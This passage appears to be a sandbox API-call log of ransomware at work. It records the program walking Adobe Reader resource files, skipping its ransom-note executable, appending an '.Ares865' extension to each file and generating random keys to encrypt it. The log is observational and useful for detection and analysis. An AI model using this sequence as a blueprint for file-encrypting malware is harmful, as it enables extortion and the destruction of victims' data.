dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0157.198] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.199] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="fin49.lex" | out: lpString1="fin49.lex") returned="fin49.lex" [0157.199] lstrlenW (lpString="fin49.lex") returned 9 [0157.199] lstrlenW (lpString="Ares865") returned 7 [0157.199] lstrcmpiW (lpString1="n49.lex", lpString2="Ares865") returned 1 [0157.200] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\fin49.lex.Ares865") returned 105 [0157.200] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\fin49.lex" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\fin49.lex"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\fin49.lex.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\fin49.lex.ares865"), dwFlags=0x1) returned 1 [0157.202] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\fin49.lex.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\fin49.lex.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0157.202] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=676864) returned 1 [0157.203] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0157.203] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0157.204] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.314] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0157.315] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0157.315] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.324] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="finphon.env.Ares865" | out: lpString1="finphon.env.Ares865") returned="finphon.env.Ares865" [0157.324] lstrlenW (lpString="finphon.env.Ares865") returned 19 [0157.324] lstrlenW (lpString="Ares865") returned 7 [0157.324] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0157.324] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7df05d00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x6f4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="frn.fca", cAlternateFileName="")) returned 1 [0157.324] lstrcmpiW (lpString1="frn.fca", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0157.324] lstrcmpiW (lpString1="frn.fca", lpString2="aoldtz.exe") returned 1 [0157.324] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="frn.fca" | out: lpString1="frn.fca") returned="frn.fca" [0157.324] lstrlenW (lpString="frn.fca") returned 7 [0157.324] lstrlenW (lpString="Ares865") returned 7 [0157.325] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\frn.fca.Ares865") returned 103 [0157.325] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\frn.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\frn.fca"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\frn.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\frn.fca.ares865"), dwFlags=0x1) returned 1 [0157.328] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\frn.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\frn.fca.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0157.328] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1780) returned 1 [0157.328] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0157.329] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0157.329] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.333] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0157.334] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0157.334] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.334] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="frn.hyp" | out: lpString1="frn.hyp") returned="frn.hyp" [0157.334] lstrlenW (lpString="frn.hyp") returned 7 [0157.334] lstrlenW (lpString="Ares865") returned 7 [0157.335] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\frn.hyp.Ares865") returned 103 [0157.335] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\frn.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\frn.hyp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\frn.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\frn.hyp.ares865"), dwFlags=0x1) returned 1 [0157.337] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\frn.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\frn.hyp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0157.337] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8192) returned 1 [0157.338] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0157.338] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0157.338] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.343] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0157.343] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0157.343] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.344] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="frn21.hsp" | out: lpString1="frn21.hsp") returned="frn21.hsp" [0157.344] lstrlenW (lpString="frn21.hsp") returned 9 [0157.344] lstrlenW (lpString="Ares865") returned 7 [0157.344] lstrcmpiW (lpString1="n21.hsp", lpString2="Ares865") returned 1 [0157.344] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\frn21.hsp.Ares865") returned 105 [0157.345] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\frn21.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\frn21.hsp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\frn21.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\frn21.hsp.ares865"), dwFlags=0x1) returned 1 [0157.347] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\frn21.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\frn21.hsp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0157.347] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=279168) returned 1 [0157.347] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0157.348] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0157.348] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.383] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0157.383] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0157.383] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.388] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="frn32.clx" | out: lpString1="frn32.clx") returned="frn32.clx" [0157.388] lstrlenW (lpString="frn32.clx") returned 9 [0157.388] lstrlenW (lpString="Ares865") returned 7 [0157.388] lstrcmpiW (lpString1="n32.clx", lpString2="Ares865") returned 1 [0157.388] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\frn32.clx.Ares865") returned 105 [0157.388] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\frn32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\frn32.clx"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\frn32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\frn32.clx.ares865"), dwFlags=0x1) returned 1 [0157.391] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\frn32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\frn32.clx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0157.392] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32758) returned 1 [0157.392] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0157.393] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0157.393] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.403] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0157.404] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0157.404] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.405] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="frn93.ths" | out: lpString1="frn93.ths") returned="frn93.ths" [0157.405] lstrlenW (lpString="frn93.ths") returned 9 [0157.405] lstrlenW (lpString="Ares865") returned 7 [0157.405] lstrcmpiW (lpString1="n93.ths", lpString2="Ares865") returned 1 [0157.406] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\frn93.ths.Ares865") returned 105 [0157.406] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\frn93.ths" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\frn93.ths"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\frn93.ths.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\frn93.ths.ares865"), dwFlags=0x1) returned 1 [0157.410] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\frn93.ths.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\frn93.ths.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0157.410] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=313344) returned 1 [0157.411] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0157.411] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0157.411] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.469] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0157.470] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0157.470] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.475] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="gre.fca" | out: lpString1="gre.fca") returned="gre.fca" [0157.475] lstrlenW (lpString="gre.fca") returned 7 [0157.475] lstrlenW (lpString="Ares865") returned 7 [0157.475] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\gre.fca.Ares865") returned 103 [0157.475] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\gre.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\gre.fca"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\gre.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\gre.fca.ares865"), dwFlags=0x1) returned 1 [0157.480] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\gre.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\gre.fca.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0157.480] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=672) returned 1 [0157.480] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0157.481] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0157.481] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.485] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0157.485] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0157.485] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.486] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="gre.hyp" | out: lpString1="gre.hyp") returned="gre.hyp" [0157.486] lstrlenW (lpString="gre.hyp") returned 7 [0157.486] lstrlenW (lpString="Ares865") returned 7 [0157.487] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\gre.hyp.Ares865") returned 103 [0157.487] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\gre.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\gre.hyp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\gre.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\gre.hyp.ares865"), dwFlags=0x1) returned 1 [0157.511] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\gre.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\gre.hyp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0157.511] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2048) returned 1 [0157.512] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0157.513] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0157.513] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.522] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0157.523] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0157.523] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.533] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="gre110.hsp" | out: lpString1="gre110.hsp") returned="gre110.hsp" [0157.533] lstrlenW (lpString="gre110.hsp") returned 10 [0157.533] lstrlenW (lpString="Ares865") returned 7 [0157.533] lstrcmpiW (lpString1="110.hsp", lpString2="Ares865") returned -1 [0157.533] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\gre110.hsp.Ares865") returned 106 [0157.533] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\gre110.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\gre110.hsp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\gre110.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\gre110.hsp.ares865"), dwFlags=0x1) returned 1 [0157.535] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\gre110.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\gre110.hsp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0157.536] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=298421) returned 1 [0157.536] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0157.537] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0157.537] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.571] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0157.572] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0157.572] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.576] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="gre32.clx" | out: lpString1="gre32.clx") returned="gre32.clx" [0157.576] lstrlenW (lpString="gre32.clx") returned 9 [0157.576] lstrlenW (lpString="Ares865") returned 7 [0157.576] lstrcmpiW (lpString1="e32.clx", lpString2="Ares865") returned 1 [0157.577] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\gre32.clx.Ares865") returned 105 [0157.577] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\gre32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\gre32.clx"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\gre32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\gre32.clx.ares865"), dwFlags=0x1) returned 1 [0157.580] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\gre32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\gre32.clx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0157.580] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32737) returned 1 [0157.580] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0157.581] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0157.581] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.585] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0157.585] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0157.585] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.586] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="grm.fca" | out: lpString1="grm.fca") returned="grm.fca" [0157.586] lstrlenW (lpString="grm.fca") returned 7 [0157.586] lstrlenW (lpString="Ares865") returned 7 [0157.587] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\grm.fca.Ares865") returned 103 [0157.587] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\grm.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\grm.fca"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\grm.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\grm.fca.ares865"), dwFlags=0x1) returned 1 [0157.590] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\grm.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\grm.fca.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0157.590] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1436) returned 1 [0157.590] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0157.591] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0157.591] 